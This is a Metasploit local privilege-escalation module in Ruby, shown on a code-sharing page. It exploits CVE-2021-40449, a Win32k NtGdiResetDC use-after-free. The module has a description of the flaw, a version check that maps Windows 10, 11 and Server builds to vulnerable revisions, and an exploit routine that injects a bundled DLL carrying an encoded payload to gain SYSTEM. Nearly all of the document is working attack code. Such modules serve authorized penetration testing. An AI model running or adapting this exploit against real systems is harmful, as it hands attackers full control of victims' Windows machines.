Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = GoodRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Windows::Priv
11
  include Msf::Post::Windows::Version
12
  include Msf::Post::Windows::Process
13
  include Msf::Post::Windows::ReflectiveDLLInjection
14
  prepend Msf::Exploit::Remote::AutoCheck
15

16
  def initialize(info = {})
17
    super(
18
      update_info(
19
        info,
20
        {
21
          'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',
22
          'Description' => %q{
23
            A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by
24
            an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact
25
            that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers
26
            can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object
27
            that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle
28
            with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the
29
            attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the
30
            kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.
31

32
            This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions
33
            of Windows 10 will likely also work.
34
          },
35
          'License' => MSF_LICENSE,
36
          'Author' => [
37
            'IronHusky', # APT Group who exploited this in the wild
38
            'Costin Raiu', # Initial reporting on bug at SecureList
39
            'Boris Larin', # Initial reporting on bug at SecureList
40
            "Red Raindrop Team of Qi'anxin Threat Intelligence Center", # detailed analysis report in Chinese showing how to replicate the vulnerability
41
            'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763
42
            'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.
43
            'Grant Willcox' # metasploit module
44
          ],
45
          'Arch' => [ ARCH_X64 ],
46
          'Platform' => 'win',
47
          'SessionTypes' => [ 'meterpreter' ],
48
          'DefaultOptions' => {
49
            'EXITFUNC' => 'thread'
50
          },
51
          'Targets' => [
52
            [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]
53
          ],
54
          'Payload' => {
55
            'DisableNops' => true
56
          },
57
          'References' => [
58
            [ 'CVE', '2021-40449' ],
59
            [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation
60
            [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup
61
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC
62
            [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.
63
          ],
64
          'DisclosureDate' => '2021-10-12',
65
          'DefaultTarget' => 0,
66
          'Notes' => {
67
            'Stability' => [ CRASH_OS_RESTARTS, ],
68
            'Reliability' => [ REPEATABLE_SESSION, ],
69
            'SideEffects' => []
70
          }
71
        }
72
      )
73
    )
74
  end
75

76
  def check
77
    if session.platform != 'windows'
78
      # Non-Windows systems are definitely not affected.
79
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
80
    end
81

82
    version = get_version_info
83
    unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H1) ||
84
           version.build_number == Msf::WindowsVersion::Server2022 ||
85
           version.build_number == Msf::WindowsVersion::Win11_21H2
86
      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
87
    end
88

89
    # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/
90
    if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.revision_number.between?(0, 257)
91
      return CheckCode::Appears('Vulnerable Windows 11 build detected!')
92
    elsif version.build_number == Msf::WindowsVersion::Server2022 && version.revision_number.between?(0, 287)
93
      return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
94
    elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.revision_number.between?(0, 1318)
95
      return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
96
    elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.revision_number.between?(0, 1287)
97
      return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
98
    elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.revision_number.between?(0, 1287)
99
      return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
100
    elsif version.build_number == Msf::WindowsVersion::Win10_2004 && version.revision_number.between?(0, 1287)
101
      return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
102
    elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.revision_number.between?(0, 1853)
103
      return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
104
    elsif version.build_number == Msf::WindowsVersion::Win10_1903
105
      return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
106
    elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.revision_number.between?(0, 2236)
107
      return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
108
    elsif version.build_number == Msf::WindowsVersion::Win10_1803
109
      return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
110
    elsif version.build_number == Msf::WindowsVersion::Win10_1709
111
      return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
112
    elsif version.build_number == Msf::WindowsVersion::Win10_1703
113
      return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
114
    elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.revision_number.between?(0, 4703)
115
      return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
116
    elsif version.build_number == Msf::WindowsVersion::Win10_1511
117
      return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
118
    elsif version.build_number == Msf::WindowsVersion::Win10_1507 && version.revision_number.between?(0, 19085)
119
      return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
120
    elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2
121
      return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')
122
    elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012
123
      return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')
124
    elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2
125
      return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')
126
    elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update)
127
      return CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')
128
    else
129
      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
130
    end
131
  end
132

133
  def exploit
134
    if is_system?
135
      fail_with(Failure::None, 'Session is already elevated')
136
    end
137

138
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
139
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
140
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
141
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
142
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
143
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
144
    end
145

146
    encoded_payload = payload.encoded
147
    execute_dll(
148
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),
149
      [encoded_payload.length].pack('I<') + encoded_payload
150
    )
151

152
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
153
  end
154
end
155

156